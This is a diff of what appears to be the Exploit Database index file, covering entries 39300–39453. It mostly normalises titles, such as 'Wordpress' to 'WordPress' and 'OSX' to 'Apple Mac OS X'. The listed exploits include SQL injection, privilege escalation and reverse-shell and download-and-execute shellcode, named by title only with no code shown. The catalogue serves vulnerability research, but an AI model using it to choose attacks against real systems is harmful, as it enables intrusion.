+39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 +39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 +39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 +39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 +39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 39306,platforms/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",php,webapps,443 -39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39375,platforms/osx/dos/39375.c,"Apple Mac OS X - Kernel IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39308,platforms/linux/dos/39308.c,"Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 -39309,platforms/php/webapps/39309.txt,"Wordpress Booking Calendar Contact Form Plugin 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 -39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 -39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 +39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 +39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 +39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39313,platforms/php/webapps/39313.txt,"Food Order Portal - 'admin_user_delete.php' Cross-Site Request Forgery",2014-09-12,KnocKout,php,webapps,0 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0 39315,platforms/hardware/dos/39315.pl,"Multiple Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",hardware,dos,0 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 -39317,platforms/php/webapps/39317.txt,"Wordpress Wordfence Security Plugin - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 +39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 39318,platforms/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Function Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote,0 -39319,platforms/php/webapps/39319.txt,"Wordpress Booking Calendar Contact Form Plugin 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 +39319,platforms/php/webapps/39319.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80 39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 @@ -35577,78 +35580,78 @@ id,file,description,date,author,platform,type,port 39331,platforms/windows/dos/39331.pl,"TFTPD32 and Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 39332,platforms/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39333,platforms/php/webapps/39333.html,"Wordpress Elegance Theme - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 +39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones - '/servlet' HTTP Response Splitting",2014-06-12,"Jesus Oquendo",java,webapps,0 39335,platforms/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080 39336,platforms/linux/shellcode/39336.c,"Linux x86 & x86_64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39353,platforms/windows/dos/39353.txt,"VLC Media Player 2.2.1 - .mp4 Heap Memory Corruption",2016-01-28,"Francis Provencher",windows,dos,0 +39353,platforms/windows/dos/39353.txt,"VLC Media Player 2.2.1 - '.mp4' Heap Memory Corruption",2016-01-28,"Francis Provencher",windows,dos,0 39337,platforms/linux/shellcode/39337.c,"Linux x86 & x86_64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86 & x86_64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 39340,platforms/android/local/39340.cpp,"Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0 -39341,platforms/php/webapps/39341.txt,"Wordpress Booking Calendar Contact Form 1.1.24 Plugin - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39342,platforms/php/webapps/39342.txt,"Wordpress Booking Calendar Contact Form 1.1.24 Plugin - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 +39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form 1.1.24 Plugin - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 +39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form 1.1.24 Plugin - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39343,platforms/php/webapps/39343.txt,"ol-commerce - /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39344,platforms/php/webapps/39344.txt,"ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39345,platforms/php/webapps/39345.txt,"ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39346,platforms/php/webapps/39346.txt,"ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39347,platforms/php/webapps/39347.txt,"Fonality trixbox - /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39348,platforms/php/webapps/39348.txt,"Fonality trixbox - /maint/modules/home/index.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39349,platforms/php/webapps/39349.txt,"Fonality trixbox - /maint/modules/asterisk_info/asterisk_info.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39350,platforms/php/webapps/39350.txt,"Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39351,platforms/php/webapps/39351.txt,"Fonality trixbox - /maint/modules/endpointcfg/endpointcfg.php lang Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39348,platforms/php/webapps/39348.txt,"Fonality trixbox - /maint/modules/home/index.php lang Parameter Directory Traversal",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39349,platforms/php/webapps/39349.txt,"Fonality trixbox - '/maint/modules/asterisk_info/asterisk_info.php' lang Parameter Directory Traversal",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39350,platforms/php/webapps/39350.txt,"Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Directory Traversal",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39351,platforms/php/webapps/39351.txt,"Fonality trixbox - '/maint/modules/endpointcfg/endpointcfg.php' lang Directory Traversal",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39352,platforms/php/webapps/39352.txt,"Fonality trixbox - /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80 39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 -39357,platforms/osx/dos/39357.txt,"iOS/OSX - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 -39358,platforms/multiple/dos/39358.txt,"iOS/OSX - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 +39357,platforms/osx/dos/39357.txt,"Apple Mac OS X / iOS - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 +39358,platforms/multiple/dos/39358.txt,"Apple Mac OS X / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 39359,platforms/ios/dos/39359.txt,"iOS Kernel - AppleOscarGyro Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39360,platforms/ios/dos/39360.txt,"iOS Kernel - AppleOscarAccelerometer Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39361,platforms/ios/dos/39361.txt,"iOS Kernel - AppleOscarCompass Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39362,platforms/ios/dos/39362.txt,"iOS Kernel - AppleOscarCMA Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39363,platforms/ios/dos/39363.txt,"iOS Kernel - IOHIDEventService Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39364,platforms/ios/dos/39364.txt,"iOS Kernel - IOReportHub Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 -39365,platforms/multiple/dos/39365.c,"OS X and iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double Free",2016-01-28,"Google Security Research",multiple,dos,0 -39366,platforms/multiple/dos/39366.c,"OS X and iOS Kernel - iokit Registry Iterator Manipulation Double Free",2016-01-28,"Google Security Research",multiple,dos,0 -39367,platforms/osx/dos/39367.c,"OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39368,platforms/osx/dos/39368.c,"OSX - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 -39369,platforms/osx/dos/39369.c,"OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39370,platforms/osx/dos/39370.c,"OS X Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39376,platforms/osx/dos/39376.c,"OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39377,platforms/multiple/dos/39377.c,"OS X and iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 -39378,platforms/multiple/dos/39378.c,"iOS and OSX - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 -39379,platforms/multiple/dos/39379.txt,"iOS and OSX Kernel - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 -39380,platforms/osx/dos/39380.c,"OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39381,platforms/osx/dos/39381.c,"OSX - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0 +39365,platforms/multiple/dos/39365.c,"Apple Mac OS X / iOS - Kernel IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 +39366,platforms/multiple/dos/39366.c,"Apple Mac OS X / iOS - Kernel iokit Registry Iterator manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 +39367,platforms/osx/dos/39367.c,"Apple Mac OS X - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39368,platforms/osx/dos/39368.c,"Apple Mac OS X - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 +39369,platforms/osx/dos/39369.c,"Apple Mac OS X - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39370,platforms/osx/dos/39370.c,"Apple Mac OS X - Kernel Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39376,platforms/osx/dos/39376.c,"Apple Mac OS X - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39377,platforms/multiple/dos/39377.c,"Apple Mac OS X / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 +39378,platforms/multiple/dos/39378.c,"Apple Mac OS X / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 +39379,platforms/multiple/dos/39379.txt,"Apple Mac OS X / iOS - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 +39380,platforms/osx/dos/39380.c,"Apple Mac OS X - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39381,platforms/osx/dos/39381.c,"Apple Mac OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 -39384,platforms/php/webapps/39384.txt,"Wordpress Simple Add Pages or Posts Plugin 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps,0 +39384,platforms/php/webapps/39384.txt,"WordPress Simple Add Pages or Posts Plugin 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps,0 39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80 -39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80 +39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution",2016-02-01,"Bikramaditya Guha",php,webapps,80 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download & Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39391,platforms/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80 39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0 39394,platforms/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,multiple,webapps,80 -39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - .ppt Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 -39396,platforms/windows/dos/39396.txt,"WPS Office < 2016 - .doc OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 -39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - .ppt drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 -39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - .xls Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 +39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - '.ppt' Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 +39396,platforms/windows/dos/39396.txt,"WPS Office < 2016 - '.doc' OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 +39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - '.ppt' drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 +39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - '.xls' Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 39399,platforms/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",multiple,webapps,0 39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0 39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0 39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80 39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow",2016-02-03,LiquidWorm,windows,dos,0 -39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,php,webapps,80 +39404,platforms/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,php,webapps,80 39405,platforms/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,jsp,webapps,80 39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0 39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,hardware,webapps,0 39408,platforms/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 39409,platforms/hardware/webapps/39409.txt,"DLink DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 -39410,platforms/php/webapps/39410.txt,"Wordpress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 -39411,platforms/php/webapps/39411.txt,"Wordpress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 +39410,platforms/php/webapps/39410.txt,"WordPress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 +39411,platforms/php/webapps/39411.txt,"WordPress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0 39413,platforms/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80 39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",php,webapps,80 @@ -35657,35 +35660,35 @@ id,file,description,date,author,platform,type,port 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0 39418,platforms/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,java,webapps,0 39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - Cross-Site Request Forgery",2016-02-08,hyp3rlinx,multiple,webapps,0 -39420,platforms/php/webapps/39420.txt,"Wordpress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39421,platforms/php/webapps/39421.py,"Wordpress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39422,platforms/php/webapps/39422.py,"Wordpress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39423,platforms/php/webapps/39423.txt,"Wordpress Booking Calendar Contact Form Plugin 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 +39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 +39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 +39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 +39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 39424,platforms/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos,0 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 -39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection",2010-03-10,"Secunia Research",php,webapps,0 -39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0 -39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC - .png File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 -39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - .png File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 -39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - .IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 -39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 +39427,platforms/php/webapps/39427.txt,"Employee TimeClock Software 0.99 - SQL Injection",2010-03-10,"Secunia Research",php,webapps,0 +39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0 +39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 +39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 +39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 +39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure",2016-02-10,Vulnerability-Lab,multiple,webapps,0 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution",2016-02-10,Metasploit,hardware,remote,0 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 -39442,platforms/windows/local/39442.txt,"Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0 +39442,platforms/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local,0 -39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - .pgm Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 +39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0 39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80 39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 39450,platforms/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 -39451,platforms/php/webapps/39451.txt,"Wordpress ALO EasyMail Newsletter Plugin 2.6.01 - Cross-Site Request Forgery",2016-02-16,"Mohsen Lotfi",php,webapps,80 +39451,platforms/php/webapps/39451.txt,"WordPress ALO EasyMail NewsLetter Plugin 2.6.01 - Cross-Site Request Forgery",2016-02-16,"Mohsen Lotfi",php,webapps,80 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / Cross-Site Request 